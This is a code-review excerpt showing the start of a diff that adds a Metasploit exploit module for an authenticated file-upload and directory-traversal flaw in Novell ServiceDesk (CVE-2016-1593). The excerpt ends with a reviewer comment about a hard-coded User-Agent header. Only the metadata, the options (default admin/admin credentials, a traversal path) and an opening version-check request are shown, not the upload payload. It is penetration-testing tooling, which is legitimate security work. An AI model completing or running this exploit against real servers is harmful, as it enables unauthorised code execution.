modules/exploits/multi/http/novell_servicedesk_rce.rb

```diff
@@ -0,0 +1,384 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Novell ServiceDesk Authenticated File Upload',
+      'Description'    => %q{
+        This module exploits an authenticated arbitrary file upload via directory traversal
+        to execute code on the target. It has been tested on versions 6.5 and 7.1.0, in
+        Windows and Linux installations of Novell ServiceDesk, as well as the Virtual
+        Appliance provided by Novell.
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2016-1593' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt' ],
+          [ 'URL', 'FULLDISC' ]
+        ],
+      'Platform'    => %w{ linux win },
+      'Arch'           => ARCH_X86,
+      'DefaultOptions' => { 'WfsDelay' => 15 },
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [ 'Novell ServiceDesk / Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86
+            }
+          ],
+          [ 'Novell ServiceDesk / Windows',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_X86
+            }
+          ],
+        ],
+      'Privileged'     => false,  # Privileged on Windows but not on (most) Linux targets
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 30 2016'
+    ))
+
+    register_options(
+      [
+        OptPort.new('RPORT',
+          [true, 'The target port', 80]),
+        OptString.new('USERNAME',
+          [true, 'The username to login as', 'admin']),
+        OptString.new('PASSWORD',
+          [true, 'Password for the specified username', 'admin']),
+        OptString.new('TRAVERSAL_PATH',
+          [false, 'Traversal path to tomcat/webapps/LiveTime/'])
+      ], self.class)
+  end
+
+
+  def get_version
+    res = send_request_cgi({
+      'uri'    => normalize_uri('LiveTime','WebObjects','LiveTime.woa'),
+      'method' => 'GET',
+      'headers' => {
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+      }
```

Comment:
The user agent header should be removed. The send_request_cgi will select an appropriate UA automatically.